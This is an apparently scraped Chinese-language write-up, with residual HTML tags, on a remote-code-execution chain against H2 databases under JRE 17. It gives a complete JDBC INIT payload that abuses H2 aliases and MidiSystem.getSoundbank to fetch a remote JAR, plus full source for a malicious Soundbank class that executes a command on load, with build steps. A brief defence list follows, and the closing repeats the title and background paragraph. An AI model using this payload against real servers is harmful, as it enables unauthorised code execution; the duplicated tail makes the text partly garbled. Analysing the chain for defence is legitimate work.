H2 RCE在JRE 17环境下的利用技术分析<\/h1>

背景介绍<\/h2>
在Java 17环境中，由于Nashorn JavaScript引擎被移除（实际上从Java 15开始就被删除），且JRE没有javac命令，传统的H2数据库RCE利用方式失效。本文详细分析在JRE 17环境下利用H2数据库实现远程代码执行的技术细节。<\/p>

环境要求<\/h2>

JDK版本：17.0.11<\/li>
H2数据库版本：2.0.204<\/li>

CodeQL分析使用H2数据库版本：2.3.239（使用JDK8编译）<\/li> <\/ul>

技术挑战<\/h2>

Java 17的限制<\/strong>：<\/p>

移除了Nashorn JavaScript引擎<\/li>
JRE环境缺少javac命令<\/li>
JDK 16+的module强封装机制<\/li> <\/ul> <\/li>

序列化限制<\/strong>：<\/p>

参数需要是可序列化的对象<\/li>
传统URLClassLoader无法直接序列化<\/li> <\/ul> <\/li> <\/ol>
利用技术分析<\/h2>
关键利用点<\/h3>

对象实例化<\/strong>：<\/p>

使用org.h2.util.Utils.newInstance<\/code>反射创建对象<\/li>
结合javax.naming.ldap.Rdn.unescapeValue<\/code>进行字符串到对象的转换<\/li> <\/ul> <\/li>
MidiSystem利用<\/strong>：<\/p> 通过javax.sound.midi.MidiSystem.getSoundbank<\/code>加载远程JAR<\/li> 利用Soundbank SPI机制执行恶意代码<\/li> <\/ul> <\/li> <\/ol> 完整Payload<\/h3> jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=<\/span>3<\/span>;INIT=<\/span>CREATE<\/span> ALIAS<\/span> Utils_INSTANCE FOR<\/span> <\/span><\/span>'org.h2.util.Utils.newInstance(java.lang.String,java.lang.Object[])'<\/span>\<\/span>; <\/span><\/span>SET<\/span> @<\/span>classname_str=<\/span>'java.net.URL'<\/span>\<\/span>; <\/span><\/span>CREATE<\/span> ALIAS<\/span> UNESCAPE_VALUE FOR<\/span> <\/span><\/span>'javax.naming.ldap.Rdn.unescapeValue(java.lang.String)'<\/span>\<\/span>; <\/span><\/span>SET<\/span> @<\/span>url_str=<\/span>'http:\/\/127.0.0.1:8000\/1.jar'<\/span>\<\/span>; <\/span><\/span>SET<\/span> @<\/span>url_obj=<\/span>UNESCAPE_VALUE(@<\/span>url_str)\<\/span>; <\/span><\/span>SET<\/span> @<\/span>url_object=<\/span>Utils_INSTANCE(@<\/span>classname_str,@<\/span>url_obj)\<\/span>; <\/span><\/span>CREATE<\/span> ALIAS<\/span> System_INSTANCE FOR<\/span> <\/span><\/span>'java.lang.System.setProperty(java.lang.String,java.lang.String)'<\/span>\<\/span>; <\/span><\/span>CALL<\/span> System_INSTANCE('jdk.sound.jarsoundbank'<\/span>,'true'<\/span>)\<\/span>; <\/span><\/span>CREATE<\/span> ALIAS<\/span> MidiSystem_INSTANCE FOR<\/span> <\/span><\/span>'javax.sound.midi.MidiSystem.getSoundbank(java.net.URL)'<\/span>\<\/span>; <\/span><\/span>CALL<\/span> MidiSystem_INSTANCE(@<\/span>url_object)\<\/span>; <\/span><\/span><\/code><\/pre>恶意JAR构造<\/h3> 文件结构：<\/p> src\/ ├── Evil.java └└── META-INF └└── services └└── javax.sound.midi.Soundbank <\/code><\/pre> Evil.java内容<\/strong>：<\/p> import<\/span> javax.sound.midi.Instrument;<\/span> <\/span><\/span>import<\/span> javax.sound.midi.Patch;<\/span> <\/span><\/span>import<\/span> javax.sound.midi.SoundbankResource;<\/span> <\/span><\/span>import<\/span> java.io.IOException;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Evil<\/span> implements<\/span> javax.<\/span>sound<\/span>.<\/span>midi<\/span>.<\/span>Soundbank<\/span>{<\/span> <\/span><\/span> public<\/span> Evil<\/span>()<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> String getName<\/span>()<\/span> {<\/span> return<\/span> ""<\/span>;<\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> String getVersion<\/span>()<\/span> {<\/span> return<\/span> ""<\/span>;<\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> String getVendor<\/span>()<\/span> {<\/span> return<\/span> ""<\/span>;<\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> String getDescription<\/span>()<\/span> {<\/span> return<\/span> ""<\/span>;<\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> SoundbankResource[]<\/span> getResources<\/span>()<\/span> {<\/span> return<\/span> new<\/span> SoundbankResource[<\/span>0<\/span>];<\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> Instrument[]<\/span> getInstruments<\/span>()<\/span> {<\/span> return<\/span> new<\/span> Instrument[<\/span>0<\/span>];<\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> Instrument getInstrument<\/span>(<\/span>Patch patch)<\/span> {<\/span> return<\/span> null<\/span>;<\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>javax.sound.midi.Soundbank内容<\/strong>：<\/p> Evil <\/code><\/pre> 编译命令<\/strong>：<\/p> javac src\E<\/span>vil.java <\/span><\/span>jar -cvf payload.jar -C src\/ . <\/span><\/span><\/code><\/pre>技术原理分析<\/h2> URL对象构造<\/strong>：<\/p> 使用H2内置的org.h2.util.Utils.newInstance<\/code>反射构造URL对象<\/li> 通过Rdn.unescapeValue<\/code>进行字符串到对象的转换<\/li> <\/ul> <\/li> MidiSystem利用链<\/strong>：<\/p> MidiSystem.getSoundbank(URL)<\/code>会尝试加载JAR文件<\/li> 内部使用JARSoundbankReader#getSoundbank(URL)<\/code>方法<\/li> 该方法实现了类似ServiceLoader.load(Class)<\/code>的功能<\/li> <\/ul> <\/li> 关键系统属性<\/strong>：<\/p> 需要设置jdk.sound.jarsoundbank<\/code>为true<\/li> 通过System.setProperty<\/code>设置<\/li> 否则Boolean.getBoolean(JAR_SOUNDBANK_ENABLED)<\/code>检查会失败<\/li> <\/ul> <\/li> <\/ol> 防御建议<\/h2> 升级H2数据库到最新版本<\/li> 限制H2数据库的网络访问<\/li> 在Java安全策略中限制相关类的反射调用<\/li> 监控System.setProperty<\/code>的调用<\/li> 对加载远程JAR的行为进行审计<\/li> <\/ol> 总结<\/h2> 该技术利用H2数据库的SQL注入能力，结合Java的SPI机制和反射功能，在JRE 17环境下实现了无需额外依赖的RCE。关键在于：<\/p> 使用H2内置的反射工具类<\/li> 利用MidiSystem的JAR加载功能<\/li> 通过Soundbank SPI机制执行恶意代码<\/li> <\/ol>

H2 RCE在JRE 17环境下的利用技术分析<\/h1>

背景介绍<\/h2> 在Java 17环境中，由于Nashorn JavaScript引擎被移除（实际上从Java 15开始就被删除），且JRE没有javac命令，传统的H2数据库RCE利用方式失效。本文详细分析在JRE 17环境下利用H2数据库实现远程代码执行的技术细节。<\/p>

利用技术分析<\/h2>

背景介绍<\/h2>
在Java 17环境中，由于Nashorn JavaScript引擎被移除（实际上从Java 15开始就被删除），且JRE没有javac命令，传统的H2数据库RCE利用方式失效。本文详细分析在JRE 17环境下利用H2数据库实现远程代码执行的技术细节。<\/p>